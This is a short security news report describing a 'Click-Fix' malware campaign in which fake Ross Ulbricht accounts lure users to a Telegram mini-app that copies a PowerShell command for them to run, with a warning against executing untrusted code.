Cybercriminals are exploiting the recent pardon of Silk Road founder Ross Ulbricht to spread malware.
The attack leverages a “Click-Fix” tactic, where users are tricked into running malicious code disguised as a necessary step. In this case, fake Ross Ulbricht accounts on X (formerly Twitter) direct users to a Telegram channel.
Within the Telegram channel, users are presented with a fake “identity verification” process. This process culminates in a Telegram mini-app that automatically copies a PowerShell command to the user’s clipboard.
Victims are then instructed to paste this command into the Windows Run dialog and execute it. This action downloads and executes a malicious script, potentially leading to the installation of Cobalt Strike, a powerful penetration testing tool often used by threat actors for malicious purposes.
This sophisticated attack highlights the importance of exercising extreme caution before executing any code received from unknown sources. Users should always verify the authenticity of any such requests and never blindly execute commands from untrusted sources.